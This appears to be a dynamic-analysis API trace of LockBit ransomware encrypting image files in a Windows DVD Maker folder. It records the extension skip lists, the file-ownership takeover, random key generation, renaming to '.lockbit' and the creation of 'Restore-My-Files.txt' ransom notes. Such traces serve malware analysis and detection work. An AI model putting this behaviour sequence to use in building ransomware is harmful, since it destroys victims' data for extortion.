lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0086.348] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0086.348] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0086.348] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0086.348] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0086.348] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0086.348] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0086.348] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0086.348] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0086.348] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0086.348] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0086.348] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0086.348] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0086.348] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0086.348] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0086.348] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0086.348] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0086.348] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0086.348] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0086.348] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0086.349] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0086.349] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0086.349] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0086.349] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0086.349] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0086.349] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0086.349] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0086.349] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0086.349] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0086.349] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0086.349] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0086.349] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0086.349] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0086.349] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0086.349] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0086.349] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0086.349] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0086.349] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="blackbars80.png") returned 1 [0086.349] lstrcmpiW (lpString1="ntldr", lpString2="blackbars80.png") returned 1 [0086.349] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="blackbars80.png") returned 1 [0086.349] lstrcmpiW (lpString1="bootsect.bak", lpString2="blackbars80.png") returned 1 [0086.349] lstrcmpiW (lpString1="autorun.inf", lpString2="blackbars80.png") returned -1 [0086.349] lstrcmpiW (lpString1="thumbs.db", lpString2="blackbars80.png") returned 1 [0086.349] lstrcmpiW (lpString1="iconcache.db", lpString2="blackbars80.png") returned 1 [0086.349] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\") returned="" [0086.349] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\blackbars80.png") returned=".png" [0086.349] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0086.350] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0086.350] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0086.350] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0086.350] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0086.350] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0086.350] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0086.350] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0086.350] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0086.350] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0086.350] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0086.350] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0086.350] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0086.350] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0086.350] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0086.350] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0086.350] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0086.350] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0086.350] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0086.350] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0086.350] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0086.350] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0086.350] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0086.350] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0086.350] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0086.351] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0086.351] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0086.351] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0086.351] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\blackbars80.png.lockbit") returned 83 [0086.351] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\blackbars80.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\blackbars80.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0086.351] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0086.352] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0086.352] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0086.352] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0086.364] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0086.364] RtlFreeAnsiString (AnsiString="\\") [0086.364] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3ac) returned 0x0 [0086.364] malloc (_Size=0x200) returned 0x77d800 [0086.364] NtQueryInformationToken (in: TokenHandle=0x3ac, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0086.365] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0086.365] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0086.365] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\blackbars80.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0086.365] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\blackbars80.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0086.366] CloseHandle (hObject=0x3ac) returned 1 [0086.366] free (_Block=0x77d800) [0086.366] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\blackbars80.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\blackbars80.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0086.366] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0086.366] malloc (_Size=0x40068) returned 0x3d70048 [0086.366] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=6431) returned 1 [0086.366] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.367] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.367] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0086.367] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.367] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.367] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0086.367] ReadFile (in: hFile=0x3ac, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0086.434] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\blackbars80.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\blackbars80.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0086.434] malloc (_Size=0xbc) returned 0x1ff1e60 [0086.434] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xbc, FileInformationClass=0xa) returned 0x0 [0086.435] free (_Block=0x1ff1e60) [0086.435] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\blackbars80.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels") returned 1 [0086.435] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Restore-My-Files.txt") returned 80 [0086.435] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0086.435] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x708ceb11, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x708ceb11, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4efa391f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0086.435] lstrcmpiW (lpString1=".", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0086.435] lstrcmpiW (lpString1="..", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0086.435] PathFindExtensionW (pszPath="NavigationLeft_ButtonGraphic.png") returned=".png" [0086.435] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0086.435] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0086.435] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0086.435] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0086.435] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0086.436] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0086.436] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0086.436] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0086.436] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0086.436] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0086.436] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0086.436] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0086.436] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0086.436] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0086.436] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0086.436] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0086.436] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0086.436] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0086.436] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0086.436] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0086.436] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0086.436] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0086.436] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0086.436] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0086.436] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0086.436] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0086.436] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0086.437] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0086.437] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0086.437] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0086.437] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0086.437] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0086.437] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0086.437] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0086.437] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0086.437] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0086.437] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0086.437] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0086.437] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0086.437] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0086.437] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0086.437] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0086.437] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0086.437] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0086.437] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0086.437] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0086.437] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0086.437] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0086.437] lstrcmpiW (lpString1="ntldr", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0086.438] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0086.438] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0086.438] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0086.438] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0086.438] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0086.438] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\") returned="" [0086.438] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_ButtonGraphic.png") returned=".png" [0086.438] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0086.438] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0086.438] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0086.438] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0086.438] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0086.438] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0086.438] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0086.438] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0086.438] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0086.438] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0086.438] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0086.438] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0086.438] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0086.438] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0086.438] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0086.438] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0086.439] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0086.439] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0086.439] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0086.439] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0086.439] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0086.439] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0086.439] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0086.439] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0086.439] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0086.439] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0086.439] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0086.439] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0086.439] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_ButtonGraphic.png.lockbit") returned 100 [0086.439] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0086.440] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0086.440] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0086.440] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0086.441] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0086.441] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0086.441] RtlFreeAnsiString (AnsiString="\\") [0086.441] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3a0) returned 0x0 [0086.441] malloc (_Size=0x200) returned 0x77d800 [0086.441] NtQueryInformationToken (in: TokenHandle=0x3a0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0086.441] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0086.441] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0086.441] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0086.442] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0086.442] CloseHandle (hObject=0x3a0) returned 1 [0086.442] free (_Block=0x77d800) [0086.442] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a0 [0086.443] CreateIoCompletionPort (FileHandle=0x3a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0086.443] malloc (_Size=0x40068) returned 0x3df0008 [0086.443] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5088) returned 1 [0086.443] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.443] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.443] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0086.444] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.444] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.445] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0086.445] ReadFile (in: hFile=0x3a0, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0086.452] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_ButtonGraphic.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0086.452] malloc (_Size=0xde) returned 0x1ff1e60 [0086.452] NtSetInformationFile (FileHandle=0x3a0, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xde, FileInformationClass=0xa) returned 0x0 [0086.452] free (_Block=0x1ff1e60) [0086.452] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels") returned 1 [0086.453] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Restore-My-Files.txt") returned 80 [0086.453] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0086.453] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70810440, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70810440, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4efa391f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0086.453] lstrcmpiW (lpString1=".", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0086.453] lstrcmpiW (lpString1="..", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0086.453] PathFindExtensionW (pszPath="NavigationLeft_SelectionSubpicture.png") returned=".png" [0086.453] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0086.453] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0086.453] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0086.453] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0086.453] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0086.453] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0086.453] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0086.453] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0086.453] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0086.453] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0086.453] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0086.453] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0086.454] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0086.454] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0086.454] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0086.454] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0086.454] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0086.454] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0086.454] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0086.454] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0086.454] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0086.454] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0086.454] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0086.454] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0086.454] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0086.454] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0086.454] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0086.454] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0086.454] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0086.454] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0086.454] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0086.454] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0086.454] lstrcmpiW (lpString1=".ps1", lpString2=".png") 